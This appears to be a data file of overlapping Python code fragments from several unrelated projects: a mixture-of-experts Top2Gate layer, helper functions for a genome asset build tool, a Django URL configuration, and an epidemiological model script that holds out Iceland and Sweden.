"F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec =",
"Store the capacity location for each token locations1_s = torch.sum(locations1 * mask1, dim=1)",
"__init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False)",
"per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a",
"torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations outside capacity from",
"= logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 =",
"mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per token",
"= torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: #",
"= torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting for locations",
"combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec",
"described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477",
"logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(),",
"of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity",
"min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1",
"# Create a mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1)",
"# Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import",
"locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting for",
"# Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2",
"torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec =",
"None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor,",
"= F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec",
"torch from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] =",
"logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1",
"= gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension",
"self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:",
"gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args:",
"device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s =",
"dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 =",
"Inc. and its affiliates. All rights reserved. # # This source code is",
"licensed under the BSD license found in the # LICENSE file in the"
] |
[
"\"\"\" lst = [] for i in input or []: lst.extend(i) return (",
"other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno !=",
"cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno",
"x.split(\"=\")[1] for x in lst if \"=\" in x} if lst is not",
"user command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping",
"_raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when one is requested",
"def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for specific parents",
"input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which",
"parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted as follows: [[fasta=txt,",
"in a path if it does not exist. :param str path: Path to",
"and values \"\"\" lst = [] for i in input or []: lst.extend(i)",
"the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True",
"outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir),",
"exist. :param str path: Path to create. :raises Exception: if the path creation",
"specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user command line input,",
"os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if",
"Creates all directories in a path if it does not exist. :param str",
"...] input: user command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return",
"name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes:",
".exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build",
"specification. Used in build for specific parents and input parsing. :param Iterable[Iterable[str], ...]",
"recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available",
"error with a code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path)",
"the path creation attempt hits an error with a code indicating a cause",
"lst is not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and",
"test=txt], ...] :return dict: mapping of keys, which are input names and values",
"is requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError(",
"does not exist. :param str path: Path to create. :raises Exception: if the",
"in build for specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user",
"Iterable[Iterable[str], ...] input: user command line input, formatted as follows: [[fasta=txt, test=txt], ...]",
"recipe, when one is requested :param str recipe: recipe name :raise MissingRecipeError: always",
"to create. :raises Exception: if the path creation attempt hits an error with",
"input specification. Used in build for specific parents and input parsing. :param Iterable[Iterable[str],",
"recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock",
"result :param bool skip_arg: argument selected on the CLI :param str cfg: path",
"return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe,",
"input names and values \"\"\" lst = [] for i in input or",
"lst = [] for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]:",
"the CLI :param str cfg: path to the confjg :return bool: decision --",
"\"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all",
"import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for",
"with a code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except",
"attempt hits an error with a code indicating a cause other than pre-existence.",
"lst if \"=\" in x} if lst is not None else lst )",
"and set the default to the result :param bool skip_arg: argument selected on",
"[[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are input names and",
"strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when one",
"is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in",
"_skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not forced, check if",
"the result :param bool skip_arg: argument selected on the CLI :param str cfg:",
"import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\"",
"requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe",
"confjg :return bool: decision -- whether to skip the file lock for read",
"= outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return",
"MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{',",
"an error with a code indicating a cause other than pre-existence. \"\"\" try:",
"formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are",
"parents and input parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted",
"in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst",
"\".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def",
"default to the result :param bool skip_arg: argument selected on the CLI :param",
"follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are input names",
"whether to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not",
"file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def",
"dict: mapping of keys, which are input names and values \"\"\" lst =",
"or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\"",
"x in lst if \"=\" in x} if lst is not None else",
"not forced, check if dir is writable and set the default to the",
"{x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x} if lst is",
"names and values \"\"\" lst = [] for i in input or []:",
"i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in",
"f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was",
"for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\"",
"user input specification. Used in build for specific parents and input parsing. :param",
"cfg): \"\"\" If config read lock skip was not forced, check if dir",
"selected on the CLI :param str cfg: path to the confjg :return bool:",
"recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found.",
"the default to the result :param bool skip_arg: argument selected on the CLI",
"if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in a",
"True def make_sure_path_exists(path): \"\"\" Creates all directories in a path if it does",
"to the confjg :return bool: decision -- whether to skip the file lock",
".asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input",
"else True def make_sure_path_exists(path): \"\"\" Creates all directories in a path if it",
"all directories in a path if it does not exist. :param str path:",
"code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as",
"to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg",
"command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of",
"and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir):",
"path if it does not exist. :param str path: Path to create. :raises",
"str path: Path to create. :raises Exception: if the path creation attempt hits",
"x} if lst is not None else lst ) def _single_folder_writeable(d): return os.access(d,",
"_writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists:",
"\"\"\" Raise an error for a missing recipe, when one is requested :param",
"an error for a missing recipe, when one is requested :param str recipe:",
"indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception:",
"os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\"",
"of keys, which are input names and values \"\"\" lst = [] for",
"not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If",
"on the CLI :param str cfg: path to the confjg :return bool: decision",
":param str path: Path to create. :raises Exception: if the path creation attempt",
"strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise",
"skip was not forced, check if dir is writable and set the default",
"return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories",
"missing recipe, when one is requested :param str recipe: recipe name :raise MissingRecipeError:",
"os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\"",
"read lock skip was not forced, check if dir is writable and set",
"a missing recipe, when one is requested :param str recipe: recipe name :raise",
") def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir",
":param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}'",
"'{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\"",
"skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in a path if",
"\"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" )",
"import errno import os from refgenconf import MissingRecipeError from ubiquerg import is_writable from",
"forced, check if dir is writable and set the default to the result",
"return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x} if",
"MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing",
"If config read lock skip was not forced, check if dir is writable",
"\"=\" in x} if lst is not None else lst ) def _single_folder_writeable(d):",
"as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are input",
"_parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for specific parents and",
"hits an error with a code indicating a cause other than pre-existence. \"\"\"",
"are input names and values \"\"\" lst = [] for i in input",
"not exist. :param str path: Path to create. :raises Exception: if the path",
"if it does not exist. :param str path: Path to create. :raises Exception:",
"set the default to the result :param bool skip_arg: argument selected on the",
"or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists)",
"mapping of keys, which are input names and values \"\"\" lst = []",
"import os from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import",
"skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else",
"cfg: path to the confjg :return bool: decision -- whether to skip the",
":return dict: mapping of keys, which are input names and values \"\"\" lst",
"path: Path to create. :raises Exception: if the path creation attempt hits an",
"\" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip",
"is writable and set the default to the result :param bool skip_arg: argument",
"[] for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for",
"not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates all directories in a path",
"None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def",
":param bool skip_arg: argument selected on the CLI :param str cfg: path to",
"input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if",
"lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path):",
"lock skip was not forced, check if dir is writable and set the",
"in x} if lst is not None else lst ) def _single_folder_writeable(d): return",
"raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def",
"MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError",
"_writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when",
"Raise an error for a missing recipe, when one is requested :param str",
"always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\"",
"import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification.",
"is not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d,",
"it does not exist. :param str path: Path to create. :raises Exception: if",
"bool: decision -- whether to skip the file lock for read \"\"\" return",
"strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for",
"Exception: if the path creation attempt hits an error with a code indicating",
"if the path creation attempt hits an error with a code indicating a",
"line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys,",
"import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import",
"in lst if \"=\" in x} if lst is not None else lst",
"keys, which are input names and values \"\"\" lst = [] for i",
"...] :return dict: mapping of keys, which are input names and values \"\"\"",
"config read lock skip was not forced, check if dir is writable and",
"lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x}",
"for a missing recipe, when one is requested :param str recipe: recipe name",
"outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir)",
"\"\"\" If config read lock skip was not forced, check if dir is",
"path to the confjg :return bool: decision -- whether to skip the file",
"raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a",
"_single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir",
"creation attempt hits an error with a code indicating a cause other than",
"which are input names and values \"\"\" lst = [] for i in",
"argument selected on the CLI :param str cfg: path to the confjg :return",
":param str cfg: path to the confjg :return bool: decision -- whether to",
"than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST:",
"writable and set the default to the result :param bool skip_arg: argument selected",
"the confjg :return bool: decision -- whether to skip the file lock for",
"bool skip_arg: argument selected on the CLI :param str cfg: path to the",
"Parse user input specification. Used in build for specific parents and input parsing.",
"if dir is writable and set the default to the result :param bool",
"def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir =",
"CLI :param str cfg: path to the confjg :return bool: decision -- whether",
"a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if",
"found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config",
"\"\"\" Parse user input specification. Used in build for specific parents and input",
"errno import os from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages",
"for specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user command line",
"return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or",
"def make_sure_path_exists(path): \"\"\" Creates all directories in a path if it does not",
"Used in build for specific parents and input parsing. :param Iterable[Iterable[str], ...] input:",
"if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe):",
"MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in build for specific",
"not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK)",
"when one is requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\"",
"lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False):",
"error for a missing recipe, when one is requested :param str recipe: recipe",
"'.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not",
"make_sure_path_exists(path): \"\"\" Creates all directories in a path if it does not exist.",
"= [] for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1]",
"MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg,",
"from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used in",
"input parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted as follows:",
"one is requested :param str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise",
"str recipe: recipe name :raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not",
"skip_arg: argument selected on the CLI :param str cfg: path to the confjg",
"path creation attempt hits an error with a code indicating a cause other",
"return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise",
"and input parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted as",
"os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir)",
":return bool: decision -- whether to skip the file lock for read \"\"\"",
"-- whether to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if",
"pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise",
"def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when one is",
"def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not forced, check",
"directories in a path if it does not exist. :param str path: Path",
") def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not forced,",
"input: user command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict:",
"f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg):",
"str cfg: path to the confjg :return bool: decision -- whether to skip",
":param Iterable[Iterable[str], ...] input: user command line input, formatted as follows: [[fasta=txt, test=txt],",
"Path to create. :raises Exception: if the path creation attempt hits an error",
"dir is writable and set the default to the result :param bool skip_arg:",
"os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return",
"refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions",
"_single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an",
"Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read",
":raises Exception: if the path creation attempt hits an error with a code",
"ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input):",
"if \"=\" in x} if lst is not None else lst ) def",
"create. :raises Exception: if the path creation attempt hits an error with a",
":raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \"",
"elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error",
"decision -- whether to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg))",
"build for specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user command",
"for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x",
"a code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError",
"def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif",
"from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user",
"if lst is not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK)",
"else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir,",
"read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates",
"\"\"\" Creates all directories in a path if it does not exist. :param",
"asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used",
"os from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages",
"was not forced, check if dir is writable and set the default to",
"from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def",
"( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x} if lst",
"check if dir is writable and set the default to the result :param",
"is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse",
"[]: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in",
"to the result :param bool skip_arg: argument selected on the CLI :param str",
"values \"\"\" lst = [] for i in input or []: lst.extend(i) return",
"a path if it does not exist. :param str path: Path to create.",
"from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from",
"for x in lst if \"=\" in x} if lst is not None"
] |
[] |
[
"django.conf.urls import patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name':",
"import patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}),",
"patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}), url(r'^logout/$',",
"url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}), url(r'^logout/$', 'django.contrib.auth.views.logout'), )",
"include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}), url(r'^logout/$', 'django.contrib.auth.views.logout'),",
"from django.conf.urls import patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login',"
] |
[
"cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs",
"bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type)",
"= '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras =",
"{**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model:",
"os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras",
"and sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor",
"preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] =",
"from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import",
"epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils",
"Holdout both iceland and sweden \"\"\" import pymc3 as pm from epimodel import",
"target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape",
"model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500,",
"= {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with",
"argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data",
"model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14,",
"last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class",
"extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5)",
"pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1'",
"'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd",
"model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains,",
"\"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data",
"\"\"\" :code:`iceswe.py` Holdout both iceland and sweden \"\"\" import pymc3 as pm from",
"__name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if",
"ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data)",
"model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) *",
